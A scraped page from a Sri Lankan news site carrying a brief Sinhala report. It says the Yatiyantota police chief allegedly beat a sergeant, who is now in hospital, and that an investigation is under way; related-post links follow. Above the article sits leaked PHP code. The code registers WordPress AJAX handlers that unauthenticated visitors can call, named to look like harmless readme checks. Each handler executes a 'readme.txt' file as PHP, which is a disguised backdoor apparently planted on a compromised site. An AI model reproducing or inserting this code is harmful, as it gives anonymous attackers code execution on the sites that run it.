if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } පොලිස් ලොක්කා පොඩ්ඩෙකුට පහරදීලා-පොඩ්ඩා රෝහලේ - mediahumanrights.lk
mediahumanrights.lk
News

පොලිස් ලොක්කා පොඩ්ඩෙකුට පහරදීලා-පොඩ්ඩා රෝහලේ

යටියන්තොට පොලිස් ස්ථානයේ ස්ථානාධිපතිවරයා විසින් පොලිස් සැරයන්වරයෙකුට පහරදීමේ සිද්ධියක් සම්බන්ධයෙන් විමර්ශනයක් ආරම්භ කර ඇති බව පොලිස් මූලස්ථානය පවසයි.
සහකාර පොලිස් අධිකාරීවරයෙකු විසින් අදාළ විමර්ශනය සිදුකරන බව පොලිස් මූලස්ථානය සඳහන් කරයි.
ඊයේ පෙරවරුවේ යටියන්තොට පොලීසියේ ස්ථානාධිපතිවරයා විසින් තමන්ට අතින් හා පයින් පහරදුන් බවට පහරකෑමට ලක්වූ පොලිස් සැරයන්වරයා පැමිණිල්ලක් ඉදිරිපත් කර තිබේ.
ඔහු මේ වන විට අවිස්සාවේල්ල රෝහලේ ප්‍රතිකාර ලබන බව පොලිස් මූලස්ථානය සඳහන් කරයි.

Related posts

කොටි නායකයාගේ වීර කතා ඇතුලත් CD පට ඇතුලු උපකරණ තොගයක් කිලිනොච්චියෙන්

Shiran Viraj

බැඳුම්කර වාර්තාව සතියකින් පාර්ලිමේන්තුවට

Shiran Viraj

යාපනය නගරාදිපති අත්අඩංගුවට ගැනීම ගැන ඇමරිකාවේ විරෝධය…

Shiran Viraj